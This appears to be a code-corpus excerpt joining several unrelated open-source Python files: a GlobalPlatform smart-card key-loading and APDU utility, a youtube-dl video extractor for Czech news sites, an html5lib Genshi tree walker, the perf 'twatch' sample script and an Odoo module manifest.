for reference. """ # sanity check assert 0 < keyVer and keyVer < 0x80 assert 0 < keyId and keyId < 0x80 assert len(keyComponents) > 0 KeyUQ = (None, 0x38, 0x34, 0xC8) # see GP 2.2.1, 11.1.9 templ = """ B9 #(95#($keyUQ) 96#($keyAc) 80#($keyType) 81#($keyLen) 82#($keyId) 83#($keyVer) 84#($KCV))""" d = {'keyVer': chr(keyVer)} B9 = '' dgi8113 = [] for kc in keyComponents: assert len(kc) in (2, 4), "wrong keyComponent" + kc.__str__() if len(kc) == 2: keyType, keyVal = kc keyUQ = 1 <= keyId <= 3 and KeyUQ[keyId] or 0xFF keyAc = 0x00 else: keyType, keyVal, keyUQ, keyAc = kc d['keyLen'] = chr(len(keyVal)) assert 0 <= keyType < 0xFF if keyType in (KeyType.DES_IMPLICIT, KeyType.TDES_CBC, KeyType.DES_ECB, KeyType.DES_CBC, KeyType.AES): d['KCV'] = calcKCV(keyVal, keyType == KeyType.AES) else: d['KCV'] = '' d['keyId'] = chr(keyId) for k in ('keyType', 'keyUQ', 'keyAc', 'keyId'): d[k] = chr(locals()[k]) tlv = GAF(templ).eval(**d) if keyDEK: encValue = keyDEK.encrypt(keyVal) else: encValue = keyVal B9 += tlv dgi8113.append(pack(">HB", 0x8113, len(encValue)) + encValue) keyId += 1 return(pack(">HB", 0x00B9, len(B9)) + B9, dgi8113) def storeDataPutKey(keyVer, keyComponents, keyId=1, keyDEK=None): """Build APDU for Store Data for Put Key. keyVer, keyComponents, keyId and keyDEK as in storeDataPutKeyDGI. Return APDU a u8 list.""" dgi00B9, dgi8113 = storeDataPutKeyDGI(keyVer, keyComponents, keyId, keyDEK) data = dgi00B9 + ''.join(dgi8113) assert len(data) < 256, "Longer Put Key not implemented" P1 = 0x88 P2 = 0 apdu = [0x80, INS_STOREDATA, P1, P2, len(data)] + s2l(data) return apdu # ###### Scenario 3 stuff # Preloaded ECC Curve Parameters, GP 2.2.1 AmE 4.5 # N.B., all have cofactor = 1 ECC_Curves = { 0x00: ecdsa.generator_256, # NIST P-256 0x01: ecdsa.generator_384, # NIST P-384 0x02: ecdsa.generator_521, # NIST P-521 # 0x03: brainpoolP256r1, # 0x04: brainpoolP256t1, # 0x05: brainpoolP384r1, # 0x06: brainpoolP384t1, # 0x07: brainpoolP512r1, # 0x08: brainpoolP512t1, } # tag definition T_IIN = 0x42 T_SDIN = T_CIN = 0x45 T_keyType = 0x80 T_keyLen = 0x81 T_keyID = 0x82 T_keyVer = 0x83 T_DR = 0x85 T_HostID = 0x84 T_receipt = 0x86 T_scenarioID = 0x90 T_seqCounter = 0x91 T_keyUsage = 0x95 T_keyAcc = 0x96 T_CRT = 0xA6 def X963keyDerivation(sharedSecret, bytelen, sharedInfo='', h = hashlib.sha256): """ X9.63 Key Derivation Function as deifned in TR-03111 4.3.3 bytelen - expected length of Key Data sharedSecret, sharedInfo - strings h - function to create HASH object (default hashlib.sha256) Return Key Data (string) Reference: TR-03111: BSI TR-03111 Elliptic Curve Cryptography, Version 2.0 https://www.bsi.bund.de/SharedDocs/Downloads/EN/BSI/Publications/TechGuidelines/TR03111/BSI-TR-03111_pdf.html""" keyData = '' l = h().digest_size j = (bytelen - 1)/l + 1 for i in xrange(1, 1+j): keyData += h(sharedSecret + pack(">L", i) + sharedInfo).digest() return keyData[:bytelen] def DESMAC(key, data): """ Calculate MAC single DES with final 3DES""" return DESsign(key).calc(data) ktDES = KeyType.DES_IMPLICIT ktAES = KeyType.AES class Push3scenario: """ Implementation of Global Platform Push #3 scenario (ECKA)""" def __init__(self, keyParRef, pkCASD, **kw): """ Constructor keyParRef - Key Parameter Reference pkCASD - PK.CASD.ECKA (tuple long x, long y) optional **kw: IIN, CIN (as strings)""" assert keyParRef in ECC_Curves, \ "Unknown Key param reference 0x%02X" % keyParRef self.keyParRef = keyParRef self.generator = ECC_Curves[keyParRef] self.curve = self.generator.curve() self.bytelen = len(int2s(self.curve.p())) assert self.bytelen in (32, 48, 64, 66) # currently allowed keys pkCASDxy = s2ECP(pkCASD) assert self.curve.contains_point(*pkCASDxy),\ "PK.CASD.ECKA not on the curve" self.pkCASD = ellipticcurve.Point(self.curve, *pkCASDxy) for k in ('IIN', 'CIN'): if k in kw: assert isinstance(kw[k], str) self.__dict__[k] = kw[k] def makeDGI(self, keyVer, privkey=None, keys=([(KeyType.AES, 16)]*3), zDelete=False, zDR=False, zID=False, **kw): """ Prepare data for Push #3 scenario and generate keys. keyVer - key version to create privkey - eSK.AP.ECKA (secret multiplier as string) randomly generated if None keys - [(keyType, keyLen)] to generate zDelete, zDR, zID - bits 1-3 of Parameters of scenario, (GP AmE, Tab. 4-17) optional **kw: keyId, seqCounter, SDIN, HostID Return <data for StoreData>""" if privkey is None: secexp = random.randrange(2, self.generator.order()) else: secexp = s2int(privkey) assert 1 < secexp < self.generator.order(), "Wrong eSK.AP.ECKA" print "eSK.AP.ECKA = %X" % secexp pubkey = self.generator * secexp dgi7F49 = pack(">HBB", 0x7F49, 2*self.bytelen+1, 4) + \ int2s(pubkey.x(), self.bytelen * 8) + \ int2s(pubkey.y(), self.bytelen * 8) # calculate Shared Secret, suppose that cofactor is 1 S_AB = secexp * self.pkCASD self.sharedSecret = int2s(S_AB.x(), self.bytelen * 8) print "Shared Secret =", hexlify(self.sharedSecret).upper() # build DGI 00A6 if zID: assert hasattr(self, 'IIN'), "Missing IIN while CardId requested" assert hasattr(self, 'CIN'), "Missing cIN while CardId requested" assert 'HostID' in kw and isinstance(kw['HostID'], str) self.HostCardID = ''.join([derLV(v) for v in (kw['HostID'], self.IIN, self.CIN)]) else: self.HostCardID = '' self.zDR = zDR scenarioPar = (zDelete and 1 or 0) +\ (zDR and 2 or 0) +\ (zID and 4 or 0) assert all([k[0] in (KeyType.DES_IMPLICIT, KeyType.AES) for k in keys]) ktl1 = keys[0] zDifKey = any([keys[i] != ktl1 for i in xrange(1, len(keys))]) tA6value = pack("BBBB", T_scenarioID, 2, 3, scenarioPar) if zDifKey: self.receiptAlgo = CMAC self.keyLens = [16] + [k[1] for k in keys] self.keyDesc = '' if 'keyId' in kw: tA6value += pack("BBB", T_keyID, 1, kw['keyId']) tA6value += pack("BBB", T_keyVer, 1, keyVer) # default keyUsage from GP 2.2.1 AmE tab. 4-16 for ENC, MAC, DEK for k, keyUsage in zip(keys, (0x38, 0x34, 0xC8)): if len(k) > 2: keyUsage = k[2] tB9value = pack("BBB", T_keyUsage, 1, keyUsage) if len(k) >= 4: # optional key Access as fourth elem. of key tB9value += pack("BBB", T_keyAcc, 1, k[3]) tB9value += pack("BBB", T_keyType, 1, k[0]) tB9value += pack("BBB", T_keyLen, 1, k[1]) self.keyDesc += pack("BBB", keyUsage, *k[:2]) tA6value += '\xB9' + derLV(tB9value) else: assert len(keys) in (1, 3), \ "One or three secure ch. keys expected." self.keyLens = [ktl1[1]] * (1 + len(keys)) self.receiptAlgo = ktl1[0] == KeyType.AES and CMAC or DESMAC keyUsage = len(keys) == 1 and 0x5C or 0x10 self.keyDesc = pack("BBB", keyUsage, *ktl1[:2]) tA6value += pack("BBB", T_keyUsage, 1, keyUsage) if len(ktl1) == 4: tA6value += pack("BBB", T_keyAcc, 1, ktl1[3]) tA6value += pack("BBB", T_keyType, 1, ktl1[0]) tA6value += pack("BBB", T_keyLen, 1, ktl1[1]) if 'keyId' in kw: tA6value += pack("BBB", T_keyID, 1, kw['keyId']) tA6value += pack("BBB", T_keyVer, 1, keyVer) if 'seqCounter' in kw: tA6value += chr(T_seqCounter) + derLV(kw['seqCounter']) if 'SDIN' in kw: tA6value += chr(T_SDIN) + derLV(kw['SDIN']) if zID: tA6value += chr(T_HostID) + derLV(kw['HostID']) self.tA6 = chr(T_CRT) + derLV(tA6value) dgi00A6 = pack(">HB", 0x00A6, len(self.tA6)) + self.tA6 return (dgi00A6, dgi7F49) def generKeys(self, respData): """ Verify receipt and generate symmetric keys. respData - response to Store Data (string) Return generated keys (tuple of strings)""" try: data2rec = self.tA6 except KeyError: print "Run makeDGI first" return respTLV = split2TLV(respData) if self.zDR: lenDR = (self.bytelen // 32) * 16 # map to 16, 24 or 32 DR = respTLV[0][1] assert len(respTLV) == 2 and \ respTLV[0][0] == T_DR and len(DR) == lenDR data2rec += pack("BB", T_DR, lenDR) + DR else: assert len(respTLV) == 1 assert respTLV[-1][0] == T_receipt receipt = respTLV[-1][1] sharedInfo = self.keyDesc if self.zDR: sharedInfo += DR if hasattr(self, 'HostCardID'): sharedInfo += self.HostCardID print "Shared Info =", hexlify(sharedInfo).upper() keyData = X963keyDerivation(self.sharedSecret, sum(self.keyLens), sharedInfo) keyDataIt = chunks(keyData, self.keyLens) receiptKey = keyDataIt.next() print "Receipt Key =", hexlify(receiptKey).upper() expReceipt = self.receiptAlgo(receiptKey, data2rec) assert receipt == expReceipt, "Receipt verification failed" return [k for k in keyDataIt if k] # skip empty rest def selectApplet(c, AID, logCh=0): """ Select applet on a given logical channel or open new log. channel if logCh is None. """ if logCh is None: logCh = openLogCh(c) # select the Applet on the given logical channel apdu = [logCh, INS_SELECT, 4, 0, len(AID)] + s2l(AID) resp, sw1, sw2 = c.transmit(apdu) if sw1 == 0x6C and len(AID) == 0: apdu = [logCh, INS_SELECT, 4, 0, sw2] resp, sw1, sw2 = c.transmit(apdu) if(sw1 == 0x61): apdu = [logCh, 0xC0, 0, 0, sw2] resp, sw1, sw2 = c.transmit(apdu) sw = (sw1 << 8) + sw2 if sw != 0x9000: raise ISOException(sw) respdata = l2s(resp) # close channel return (respdata, logCh) def openLogCh(c): """ Manage channel to open logical channel. """ apdu = [0, INS_MANAGE_LOGCH, 0, 0, 1] resp, sw1, sw2 = c.transmit(apdu) sw = (sw1 << 8) + sw2 if sw != 0x9000: raise ISOException(sw) return resp[0] def closeLogCh(c, logCh): apdu = [0, INS_MANAGE_LOGCH, 0x80, logCh, 0] resp, sw1, sw2 = c.transmit(apdu) sw = (sw1 << 8) + sw2 if sw != 0x9000: raise ISOException(sw) class GetStatusData: """Represent and interpret data from Get status for Packages and Modules""" def __init__(self, respdataPM, respdataApp): ind = 0 self.packages = [] while len(respdataPM) > ind: length = respdataPM[ind] pack_aid = l2s(respdataPM[ind+1: ind+1+length]) ind += length + 1 lcs = respdataPM[ind] priv = respdataPM[ind+1] nmod = respdataPM[ind+2] ind += 3 mods = [] for i in xrange(nmod): length = respdataPM[ind] mods.append(l2s(respdataPM[ind+1: ind+1+length])) ind += length + 1 self.packages.append({'pack_aid': pack_aid, 'lcs': lcs, 'priv': priv, 'modules': mods}) ind = 0 self.insts = [] while len(respdataApp) > ind: length = respdataApp[ind] app_aid = l2s(respdataApp[ind+1: ind+1+length]) ind += length + 1 lcs = respdataApp[ind] priv = respdataApp[ind+1] ind += 2 self.insts.append({'app_aid': app_aid, 'lcs': lcs, 'priv': priv}) def __str__(self): res = '' for p in self.packages: res += "Package AID: %s %02X %02X\n" % \ (hexlify(p['pack_aid']).upper().ljust(32), p['lcs'], p['priv']) for m in p['modules']: res += " module %s\n" % hexlify(m).upper().ljust(32) for p in self.insts: res += "Insts AID : %s %02X %02X\n" % \ (hexlify(p['app_aid']).upper().ljust(32), p['lcs'], p['priv']) return res def getStatus(sc, AID_pref=''): """ Issue GET STATUS apdu for packages and modules, and instances. """ res = {} for P1 in (0x10, 0x40): apdu = [0x80, INS_GETSTATUS, P1, 0, 2+len(AID_pref), 0x4F, len(AID_pref)] + s2l(AID_pref) respdata, sw1, sw2 = sc.transmit(apdu) sw = (sw1 << 8) + sw2 while sw == 0x6310: apdu = [0x80, INS_GETSTATUS, P1, 1, 2+len(AID_pref), 0x4F, len(AID_pref)] + s2l(AID_pref) resp, sw1, sw2 = sc.transmit(apdu) respdata += resp sw = (sw1 << 8) + sw2 if sw != 0x9000: raise ISOException(sw) res[P1] = respdata return GetStatusData(res[0x10], res[0x40]) def getData(c, tag): P1 = tag >> 8 P2 = tag & 0xFF apdu = [0x80, INS_GETDATA, P1, P2, 0] resp, sw1, sw2 = c.transmit(apdu) if sw1 == 0x6C: apdu[4] = sw2 resp, sw1, sw2 = c.transmit(apdu) sw = (sw1 << 8) + sw2 if sw != 0x9000: raise ISOException(sw) return l2s(resp) def getExtCardRes(c): """ Issue GET DATA with tag FF21 in order to receive Extended Card Resources (GP 2.2.1, 11.3 & ETSI TS 102.226, 8.2.1.7). Returns [num. of install applets, free NVM, free RAM]""" # CLA = 0x00: return only value # CLA = 0x80: return TLV, i.e. 0xFF21 #(value) apdu = [0x80, INS_GETDATA, 0xFF, 0x21, 0] resp, sw1, sw2 = c.transmit(apdu) if sw1 == 0x6C: apdu[4] = sw2 resp, sw1, sw2 = c.transmit(apdu) sw = (sw1 << 8) + sw2 if sw != 0x9000: raise ISOException(sw) payload = l2s(resp) result = [s2int(findTLValue(payload, (0xFF21, tag))) for tag in (0x81, 0x82, 0x83)] return result def selectFile(c, path, logCh=0): """ Select file by path from MF or MF for empty path """ if len(path) > 0: apdu = [logCh, INS_SELECT, 8, 4, len(path)] + s2l(path) else: apdu = [logCh, INS_SELECT, 0, 4, 2, 0x3F, 0x00] resp, sw1, sw2 = c.transmit(apdu) if sw1 == 0x61: resp, sw1, sw2 = c.transmit([0, 0xC0, 0, 0, sw2]) sw = (sw1 << 8) + sw2 if sw != 0x9000: raise ISOException(sw) return l2s(resp) def readBinary(c, le, logCh=0, offset=0): """Read Binary on currently selected EF""" P1 = (offset >> 8) & 0x7F P2 = offset & 0xFF apdu = [logCh, INS_READBIN, P1, P2, le] resp, sw1, sw2 = c.transmit(apdu) sw = (sw1 << 8) + sw2 if sw != 0x9000: raise ISOException(sw) return l2s(resp) def readRecord(c, recNum, logCh=0): """ Read record from currently selected EF""" apdu = [logCh, INS_READREC, recNum, 4, 0] resp, sw1, sw2 = c.transmit(apdu) if sw1 == 0x6C: apdu[4] = sw2 resp, sw1, sw2 = c.transmit(apdu) sw = (sw1 << 8) + sw2 if sw != 0x9000: raise ISOException(sw) return l2s(resp) def updateBinary(c, data, logCh=0, offset=0): """Update binary on currently selected EF""" assert len(data) < 0x100 P1 = (offset >> 8) & 0x7F P2 = offset & 0xFF apdu = [logCh, INS_UPDBIN, P1, P2, len(data)] + s2l(data) resp, sw1, sw2 = c.transmit(apdu) sw = (sw1 << 8) + sw2 if sw != 0x9000: raise ISOException(sw) def updateRecord(c, recNum, data, logCh=0): """ Update record from currently selected EF""" assert len(data) < 0x100 apdu = [logCh, INS_UPDREC, recNum, 4, len(data)] + s2l(data) resp, sw1, sw2 = c.transmit(apdu) sw = (sw1 << 8) + sw2 if sw != 0x9000: raise ISOException(sw) def verifyPin(c, pin=None, P2=0x01, logCh=0): """Verify PIN pin - value (str, 4-8bytes). If None, just get number of tries. P2 - PIN identification (0x01: PIN1 (default), 0x81: PIN2, etc.) logCh - logical channel (default 0) Return number of remaing tries or True if verification succesfull. """ lc = 0 if pin is None else 8 apdu = [logCh, INS_VERIFY_PIN, 0, P2, lc] if pin is not None: assert 4 <= len(pin) <= 8 pin += '\xFF' * (8 - len(pin)) apdu += s2l(pin) resp, sw1, sw2 = c.transmit(apdu) sw = (sw1 << 8) + sw2 if sw == 0x6983: # PIN blocked return 0 if 0x63C0 <= sw <= 0x63CA: # remaining tries return sw - 0x63C0 if sw != 0x9000: raise ISOException(sw) return True # pin verified def changePin(c, oldPin, newPin, P2=0x01, logCh=0): """Change PIN oldPin - old PIN value (str, 4-8bytes) newPin - new PIN value (str, 4-8bytes) P2 - PIN identification (0x01: PIN1 (default), 0x81: PIN2, etc.) logCh - logical channel (default 0) """ assert 4 <= len(oldPin) <= 8 oldPin += '\xFF' * (8 - len(oldPin)) assert 4 <= len(newPin) <= 8 newPin += '\xFF' * (8 - len(newPin)) apdu = [logCh, INS_CHANGE_PIN, 0, P2, 0x10] + s2l(oldPin) + s2l(newPin) resp, sw1, sw2 = c.transmit(apdu) sw = (sw1 << 8) + sw2 if sw != 0x9000: raise ISOException(sw) def disablePin(c, pin, P2=0x01, logCh=0): """Disable PIN pin - PIN value (str, 4-8bytes) P2 - PIN identification (0x01: PIN1 (default), 0x81: PIN2, etc.) logCh - logical channel (default 0) """ assert 4 <= len(pin) <= 8 pin += '\xFF' * (8 - len(pin)) apdu = [logCh, INS_DISABLE_PIN, 0, P2, 8] + s2l(pin) resp, sw1, sw2 = c.transmit(apdu) sw = (sw1 << 8) + sw2 if sw != 0x9000: raise ISOException(sw) def enablePin(c, pin, P2=0x01, logCh=0): """Enable PIN pin - PIN value (str, 4-8bytes) P2 - PIN identification (0x01: PIN1 (default), 0x81: PIN2, etc.) logCh - logical channel (default 0) """ assert 4 <= len(pin) <= 8 pin += '\xFF' * (8 - len(pin)) apdu = [logCh, INS_ENABLE_PIN, 0, P2, 8] + s2l(pin) resp, sw1, sw2 = c.transmit(apdu) sw = (sw1 << 8) + sw2 if sw != 0x9000: raise ISOException(sw) def unblockPin(c, puk, newPin, P2=0x01, logCh=0): """unblock PIN puk - new PIN value (str, 4-8bytes) newPin - PIN value (str, 4-8bytes) P2 - PIN identification (0x01: PIN1 (default), 0x81: PIN2, etc.) logCh - logical channel (default 0) """ assert len(puk) == 8 assert 4 <= len(newPin) <= 8 newPin += '\xFF' * (8 - len(newPin)) apdu = [logCh, INS_UNBLOCK_PIN, 0, P2, 0x10] + s2l(puk) + s2l(newPin) resp, sw1, sw2 = c.transmit(apdu) sw = (sw1 << 8) + sw2 if sw != 0x9000: raise ISOException(sw) def selectUSIM(c, logCh=0): """Select USIM, return AID Read EF_DIR, USIM = first application with AID of USIM (3GPP TS 31.110)""" # read EF_DIR infoDIR = selectFile(c, unhexlify('2F00'), logCh) # see ETSI 102.221 11.1.1.4.3 for coding fileDesc = findTLValue(infoDIR, (0x62, 0x82)) assert len(fileDesc) == 5 and \ fileDesc[:2] == '\x42\x21' # linear EF recLen, nRec = unpack(">HB", fileDesc[2:5]) aids = [] for recNum in xrange(1, nRec+1): try: r = readRecord(c, recNum) if r == '\xFF' * len(r): continue aid = findTLValue(r, (0x61, 0x4F)) aids.append(aid) except ISOException: break # search for USIM for aid in aids: if aid[:7] == unhexlify('A0000000871002'): infoUSIM = selectApplet(c, aid, logCh) return aid return None def cardInfo(c, USIMpin=None, logCh=0): """Deselect, read EF_DIR, EF_ICCID""" resetCard(c) histBytes = l2s(ATR(c.getATR()).getHistoricalBytes()) infoMF = selectFile(c, '', logCh) # read EF_ICCID infoICCID = selectFile(c, unhexlify('2FE2'), logCh) fileSize = s2int(findTLValue(infoICCID, (0x62, 0x80))) assert fileSize == 10, "Wrong size of EF_ICCID" iccid = swapNibbles(readBinary(c, fileSize)) # read EF_DIR infoDIR = selectFile(c, unhexlify('2F00'), logCh) # see ETSI 102.221 11.1.1.4.3 for coding fileDesc = findTLValue(infoDIR, (0x62, 0x82)) assert len(fileDesc) == 5 and \ fileDesc[:2] == '\x42\x21' # linear EF recLen, nRec = unpack(">HB", fileDesc[2:5]) dirDO = [] for recNum in xrange(1, nRec+1): try: r = readRecord(c, recNum) if r == '\xFF' * len(r): continue aid = findTLValue(r, (0x61, 0x4F)) label = findTLValue(r, (0x61, 0x50)) dirDO.append({'AID': aid, 'label': label}) except ISOException: break # select USIM and try to read IMSI aids = [DO['AID'] for DO in dirDO if DO['AID'][:7] == unhexlify('A0000000871002')] if len(aids) >= 1: aid_usim = aids[0] # choose the first AID found else: aid_usim = None if aid_usim: infoUSIM = selectApplet(c, aid_usim, logCh) if USIMpin is not None: verifyPin(c, USIMpin, logCh=logCh) infoIMSI = selectFile(c, unhexlify('7FFF6F07'), logCh) try: bimsi = readBinary(c, 9, logCh) digits = reduce(lambda d, n: d + [ord(n) & 0x0F, ord(n) >> 4], bimsi[1:1+ord(bimsi[0])], []) digits.pop(0) # remove first nibble 8 or 9 while digits[-1] == 0x0F: digits.pop() # remove trailing F imsi = ''.join([chr(ord('0')+i) for i in digits]) except ISOException: imsi = None else: imsi = None # select default applet and get tags 45 and 42 selectApplet(c, '', logCh) try: iin = findTLValue(getData(c, T_IIN), (T_IIN,)) except ISOException: iin = None try: cin = findTLValue(getData(c, T_CIN), (T_CIN,)) except ISOException: cin = None return histBytes, iccid, dirDO, imsi, iin, cin
lgpl-2.1
linglung/ytdl
youtube_dl/extractor/playtvak.py
36
6794
# coding: utf-8 from __future__ import unicode_literals from .common import InfoExtractor from ..compat import ( compat_urlparse, compat_urllib_parse_urlencode, ) from ..utils import ( ExtractorError, int_or_none, parse_iso8601, qualities, ) class PlaytvakIE(InfoExtractor): IE_DESC = 'Playtvak.cz, iDNES.cz and Lidovky.cz' _VALID_URL = r'https?://(?:.+?\.)?(?:playtvak|idnes|lidovky|metro)\.cz/.*\?(?:c|idvideo)=(?P<id>[^&]+)' _TESTS = [{ 'url': 'http://www.playtvak.cz/vyzente-vosy-a-srsne-ze-zahrady-dn5-/hodinovy-manzel.aspx?c=A150730_150323_hodinovy-manzel_kuko', 'md5': '4525ae312c324b4be2f4603cc78ceb4a', 'info_dict': { 'id': 'A150730_150323_hodinovy-manzel_kuko', 'ext': 'mp4', 'title': 'Vyžeňte vosy a sršně ze zahrady', 'description': 'md5:f93d398691044d303bc4a3de62f3e976', 'thumbnail': r're:(?i)^https?://.*\.(?:jpg|png)$', 'duration': 279, 'timestamp': 1438732860, 'upload_date': '20150805', 'is_live': False, } }, { # live video test 'url': 'http://slowtv.playtvak.cz/planespotting-0pr-/planespotting.aspx?c=A150624_164934_planespotting_cat', 'info_dict': { 'id': 'A150624_164934_planespotting_cat', 'ext': 'flv', 'title': 're:^Přímý přenos iDNES.cz [0-9]{4}-[0-9]{2}-[0-9]{2} [0-9]{2}:[0-9]{2}$', 'description': 'Sledujte provoz na ranveji Letiště Václava Havla v Praze', 'thumbnail': r're:(?i)^https?://.*\.(?:jpg|png)$', 'is_live': True, }, 'params': { 'skip_download': True, # requires rtmpdump }, }, { # idnes.cz 'url': 'http://zpravy.idnes.cz/pes-zavreny-v-aute-rozbijeni-okynek-v-aute-fj5-/domaci.aspx?c=A150809_104116_domaci_pku', 'md5': '819832ba33cd7016e58a6658577fe289', 'info_dict': { 'id': 'A150809_104116_domaci_pku', 'ext': 'mp4', 'title': 'Zavřeli jsme mraženou pizzu do auta. Upekla se', 'description': 'md5:01e73f02329e2e5760bd5eed4d42e3c2', 'thumbnail': r're:(?i)^https?://.*\.(?:jpg|png)$', 'duration': 39, 'timestamp': 1438969140, 'upload_date': '20150807', 'is_live': False, } }, { # lidovky.cz 'url': 'http://www.lidovky.cz/dalsi-demonstrace-v-praze-o-migraci-duq-/video.aspx?c=A150808_214044_ln-video_ELE', 'md5': 'c7209ac4ba9d234d4ad5bab7485bcee8', 'info_dict': { 'id': 'A150808_214044_ln-video_ELE', 'ext': 'mp4', 'title': 'Táhni! Demonstrace proti imigrantům budila emoce', 'description': 'md5:97c81d589a9491fbfa323c9fa3cca72c', 'thumbnail': r're:(?i)^https?://.*\.(?:jpg|png)$', 'timestamp': 1439052180, 'upload_date': '20150808', 'is_live': False, } }, { # metro.cz 'url': 'http://www.metro.cz/video-pod-billboardem-se-na-vltavske-roztocil-kolotoc-deti-vozil-jen-par-hodin-1hx-/metro-extra.aspx?c=A141111_173251_metro-extra_row', 'md5': '84fc1deedcac37b7d4a6ccae7c716668', 'info_dict': { 'id': 'A141111_173251_metro-extra_row', 'ext': 'mp4', 'title': 'Recesisté udělali z billboardu kolotoč', 'description': 'md5:7369926049588c3989a66c9c1a043c4c', 'thumbnail': r're:(?i)^https?://.*\.(?:jpg|png)$', 'timestamp': 1415725500, 'upload_date': '20141111', 'is_live': False, } }, { 'url': 'http://www.playtvak.cz/embed.aspx?idvideo=V150729_141549_play-porad_kuko', 'only_matching': True, }] def _real_extract(self, url): video_id = self._match_id(url) webpage = self._download_webpage(url, video_id) info_url = self._html_search_regex( r'Misc\.videoFLV\(\s*{\s*data\s*:\s*"([^"]+)"', webpage, 'info url') parsed_url = compat_urlparse.urlparse(info_url) qs = compat_urlparse.parse_qs(parsed_url.query) qs.update({ 'reklama': ['0'], 'type': ['js'], }) info_url = compat_urlparse.urlunparse( parsed_url._replace(query=compat_urllib_parse_urlencode(qs, True))) json_info = self._download_json( info_url, video_id, transform_source=lambda s: s[s.index('{'):s.rindex('}') + 1]) item = None for i in json_info['items']: if i.get('type') == 'video' or i.get('type') == 'stream': item = i break if not item: raise ExtractorError('No suitable stream found') quality = qualities(('low', 'middle', 'high')) formats = [] for fmt in item['video']: video_url = fmt.get('file') if not video_url: continue format_ = fmt['format'] format_id = '%s_%s' % (format_, fmt['quality']) preference = None if format_ in ('mp4', 'webm'): ext = format_ elif format_ == 'rtmp': ext = 'flv' elif format_ == 'apple': ext = 'mp4' # Some streams have mp3 audio which does not play # well with ffmpeg filter aac_adtstoasc preference = -1 elif format_ == 'adobe': # f4m manifest fails with 404 in 80% of requests continue else: # Other formats not supported yet continue formats.append({ 'url': video_url, 'ext': ext, 'format_id': format_id, 'quality': quality(fmt.get('quality')), 'preference': preference, }) self._sort_formats(formats) title = item['title'] is_live = item['type'] == 'stream' if is_live: title = self._live_title(title) description = self._og_search_description(webpage, default=None) or self._html_search_meta( 'description', webpage, 'description') timestamp = None duration = None if not is_live: duration = int_or_none(item.get('length')) timestamp = item.get('published') if timestamp: timestamp = parse_iso8601(timestamp[:-5]) return { 'id': video_id, 'title': title, 'description': description, 'thumbnail': item.get('image'), 'duration': duration, 'timestamp': timestamp, 'is_live': is_live, 'formats': formats, }
unlicense
xkcd1253/SocialNetworkforTwo
flask/lib/python2.7/site-packages/pip-1.4.1-py2.7.egg/pip/vendor/html5lib/treewalkers/genshistream.py
1730
2278
from __future__ import absolute_import, division, unicode_literals from genshi.core import QName from genshi.core import START, END, XML_NAMESPACE, DOCTYPE, TEXT from genshi.core import START_NS, END_NS, START_CDATA, END_CDATA, PI, COMMENT from . import _base from ..constants import voidElements, namespaces class TreeWalker(_base.TreeWalker): def __iter__(self): # Buffer the events so we can pass in the following one previous = None for event in self.tree: if previous is not None: for token in self.tokens(previous, event): yield token previous = event # Don't forget the final event! if previous is not None: for token in self.tokens(previous, None): yield token def tokens(self, event, next): kind, data, pos = event if kind == START: tag, attribs = data name = tag.localname namespace = tag.namespace converted_attribs = {} for k, v in attribs: if isinstance(k, QName): converted_attribs[(k.namespace, k.localname)] = v else: converted_attribs[(None, k)] = v if namespace == namespaces["html"] and name in voidElements: for token in self.emptyTag(namespace, name, converted_attribs, not next or next[0] != END or next[1] != tag): yield token else: yield self.startTag(namespace, name, converted_attribs) elif kind == END: name = data.localname namespace = data.namespace if name not in voidElements: yield self.endTag(namespace, name) elif kind == COMMENT: yield self.comment(data) elif kind == TEXT: for token in self.text(data): yield token elif kind == DOCTYPE: yield self.doctype(*data) elif kind in (XML_NAMESPACE, DOCTYPE, START_NS, END_NS, START_CDATA, END_CDATA, PI): pass else: yield self.unknown(kind)
gpl-2.0
Split-Screen/android_kernel_lge_gee
tools/perf/python/twatch.py
7370
1334
#! /usr/bin/python # -*- python -*- # -*- coding: utf-8 -*- # twatch - Experimental use of the perf python interface # Copyright (C) 2011 Arnaldo Carvalho de Melo <acme@redhat.com> # # This application is free software; you can redistribute it and/or # modify it under the terms of the GNU General Public License # as published by the Free Software Foundation; version 2. # # This application is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # General Public License for more details. import perf def main(): cpus = perf.cpu_map() threads = perf.thread_map() evsel = perf.evsel(task = 1, comm = 1, mmap = 0, wakeup_events = 1, watermark = 1, sample_id_all = 1, sample_type = perf.SAMPLE_PERIOD | perf.SAMPLE_TID | perf.SAMPLE_CPU | perf.SAMPLE_TID) evsel.open(cpus = cpus, threads = threads); evlist = perf.evlist(cpus, threads) evlist.add(evsel) evlist.mmap() while True: evlist.poll(timeout = -1) for cpu in cpus: event = evlist.read_on_cpu(cpu) if not event: continue print "cpu: %2d, pid: %4d, tid: %4d" % (event.sample_cpu, event.sample_pid, event.sample_tid), print event if __name__ == '__main__': main()
gpl-2.0
maljac/odoomrp-wip
mrp_bom_by_percentage/__openerp__.py
18
1240
# -*- encoding: utf-8 -*- ############################################################################## # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU Affero General Public License as # published by the Free Software Foundation, either version 3 of the # License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU Affero General Public License for more details. # # You should have received a copy of the GNU Affero General Public License # along with this program. If not, see http://www.gnu.org/licenses/. # ############################################################################## { "name": "MRP BoM By Percentage", "version": "1.0", "author": "OdooMRP team," "AvanzOSC," "Serv. Tecnol. Avanzados - Pedro M. Baeza", "category": "Manufacturing", "website": "http://www.odoomrp.com", "depends": [ "mrp", ], "data": [ "views/mrp_bom_view.xml", ], "installable": True }
agpl-3.0
xerond/lucia
ledEditor/cfilegen.py
1
2560
